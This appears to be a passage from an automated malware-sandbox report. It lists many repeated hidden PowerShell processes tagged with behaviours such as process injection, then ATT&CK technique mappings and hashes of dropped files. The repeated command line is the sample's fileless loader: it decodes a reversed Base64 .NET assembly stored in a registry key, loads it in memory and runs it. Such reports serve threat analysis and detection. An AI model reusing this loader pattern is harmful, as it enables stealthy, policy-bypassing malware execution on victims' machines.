- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:1792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4844
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:2620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5196
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5404
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5608
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5820
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:6020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5000
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:2624
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:6032
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y31maqfk.cen.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs

Filesize
2KB

MD5
ae38697351c86c7aed1711c9edc478af

SHA1
fc723672262fb8d6e5020a14e39b47a25d35aa5f

SHA256
f400644bd84a139f46d9aa7e315012ec04efe0ce966a434bd479a28155bee5af

SHA512
fbe8b492c5191e7bfe7b44c7ac00fdbcb46c9c39b28000a3d57122533bdf994109119831defc8403d74fdc84551c13b476c01275b68487cda05f9ad54b1fbd82

Download Submit
memory/2984-17-0x0000000000800000-0x0000000000874000-memory.dmp

Filesize
464KB

Download
memory/4416-13-0x00007FFF78930000-0x00007FFF793F1000-memory.dmp

Filesize
10.8MB

Download
memory/4416-14-0x00000295FF7D0000-0x00000295FF814000-memory.dmp

Filesize
272KB

Download
memory/4416-15-0x000002959B820000-0x000002959B82A000-memory.dmp

Filesize
40KB

Download
memory/4416-16-0x000002959B850000-0x000002959B85A000-memory.dmp

Filesize
40KB

Download
memory/4416-1-0x00007FFF78933000-0x00007FFF78935000-memory.dmp

Filesize
8KB

Download
memory/4416-21-0x00000295FF8A0000-0x00000295FF916000-memory.dmp

Filesize
472KB

Download
memory/4416-20-0x00007FFF78930000-0x00007FFF793F1000-memory.dmp

Filesize
10.8MB

Download
memory/4416-22-0x00007FFF78933000-0x00007FFF78935000-memory.dmp

Filesize
8KB

Download
memory/4416-23-0x00007FFF78930000-0x00007FFF793F1000-memory.dmp

Filesize
10.8MB

Download
memory/4416-24-0x00007FFF78930000-0x00007FFF793F1000-memory.dmp

Filesize
10.8MB

Download
memory/4416-12-0x00007FFF78930000-0x00007FFF793F1000-memory.dmp

Filesize
10.8MB

Download
memory/4416-2-0x00000295FF2E0000-0x00000295FF302000-memory.dmp

Filesize
136KB

Download